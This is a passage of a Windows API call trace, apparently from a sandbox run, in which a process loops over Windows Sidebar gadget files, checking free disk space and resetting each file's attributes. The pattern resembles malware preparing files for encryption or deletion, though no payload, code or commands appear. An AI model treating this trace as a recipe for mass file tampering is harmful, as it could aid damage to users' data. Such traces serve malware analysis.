lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.750] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_down.png", dwFileAttributes=0x80) returned 0 [0133.751] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.760] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_hov.png", dwFileAttributes=0x80) returned 0 [0133.762] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.766] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\reveal_rest.png", dwFileAttributes=0x80) returned 0 [0133.768] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.809] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg", dwFileAttributes=0x80) returned 0 [0133.812] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.812] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.812] CoTaskMemFree (pv=0x4e1c10) [0133.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.814] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0133.819] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\bg_sidebar.png", dwFileAttributes=0x80) returned 0 [0133.820] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0133.825] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\slideshow_glass_frame.png", dwFileAttributes=0x80) returned 0 [0133.826] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.826] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.826] CoTaskMemFree (pv=0x4e1c10) [0133.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.827] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0133.832] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\slideshow_glass_frame.png", dwFileAttributes=0x80) returned 0 [0133.833] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.833] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.833] CoTaskMemFree (pv=0x4e1c10) [0133.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.834] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0133.841] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0133.843] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0133.849] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png", dwFileAttributes=0x80) returned 0 [0133.851] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0133.857] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png", dwFileAttributes=0x80) returned 0 [0133.858] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.858] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.859] CoTaskMemFree (pv=0x4e1c10) [0133.860] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.866] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0133.868] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.873] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html", dwFileAttributes=0x80) returned 0 [0133.874] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.881] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html", dwFileAttributes=0x80) returned 0 [0133.882] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.882] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.882] CoTaskMemFree (pv=0x4e1c10) [0133.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.883] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.883] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.883] CoTaskMemFree (pv=0x4e1c10) [0133.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.884] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.884] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.884] CoTaskMemFree (pv=0x4e1c10) [0133.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.896] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.901] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png", dwFileAttributes=0x80) returned 0 [0133.903] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.908] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png", dwFileAttributes=0x80) returned 0 [0133.909] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.915] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png", dwFileAttributes=0x80) returned 0 [0133.917] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.922] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\12.png", dwFileAttributes=0x80) returned 0 [0133.923] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.928] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\13.png", dwFileAttributes=0x80) returned 0 [0133.930] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.935] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\14.png", dwFileAttributes=0x80) returned 0 [0133.936] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.941] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\15.png", dwFileAttributes=0x80) returned 0 [0133.943] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.948] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\16.png", dwFileAttributes=0x80) returned 0 [0133.950] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.955] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png", dwFileAttributes=0x80) returned 0 [0133.956] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.961] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png", dwFileAttributes=0x80) returned 0 [0133.963] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.968] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png", dwFileAttributes=0x80) returned 0 [0133.970] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.975] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png", dwFileAttributes=0x80) returned 0 [0133.976] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.981] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png", dwFileAttributes=0x80) returned 0 [0133.983] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.989] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png", dwFileAttributes=0x80) returned 0 [0133.990] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.995] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png", dwFileAttributes=0x80) returned 0 [0133.997] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.018] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png", dwFileAttributes=0x80) returned 0 [0134.020] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.025] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png", dwFileAttributes=0x80) returned 0 [0134.027] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.032] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png", dwFileAttributes=0x80) returned 0 [0134.033] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.039] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png", dwFileAttributes=0x80) returned 0 [0134.041] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.047] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png", dwFileAttributes=0x80) returned 0 [0134.048] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.054] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png", dwFileAttributes=0x80) returned 0 [0134.055] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.060] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png", dwFileAttributes=0x80) returned 0 [0134.062] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.067] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png", dwFileAttributes=0x80) returned 0 [0134.068] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.075] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png", dwFileAttributes=0x80) returned 0 [0134.076] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.081] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png", dwFileAttributes=0x80) returned 0 [0134.083] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.088] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png", dwFileAttributes=0x80) returned 0 [0134.089] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.094] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png", dwFileAttributes=0x80) returned 0 [0134.096] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.232] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png", dwFileAttributes=0x80) returned 0 [0134.252] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.258] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png", dwFileAttributes=0x80) returned 0 [0134.259] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.264] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png", dwFileAttributes=0x80) returned 0 [0134.266] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.271] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png", dwFileAttributes=0x80) returned 0 [0134.272] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.277] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png", dwFileAttributes=0x80) returned 0 [0134.279] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.284] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png", dwFileAttributes=0x80) returned 0 [0134.285] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.294] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png", dwFileAttributes=0x80) returned 0 [0134.296] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.301] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png", dwFileAttributes=0x80) returned 0 [0134.302] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.308] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\41.png", dwFileAttributes=0x80) returned 0 [0134.309] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.314] SetFileAttributesW (lpFileName="C:\\Program Files 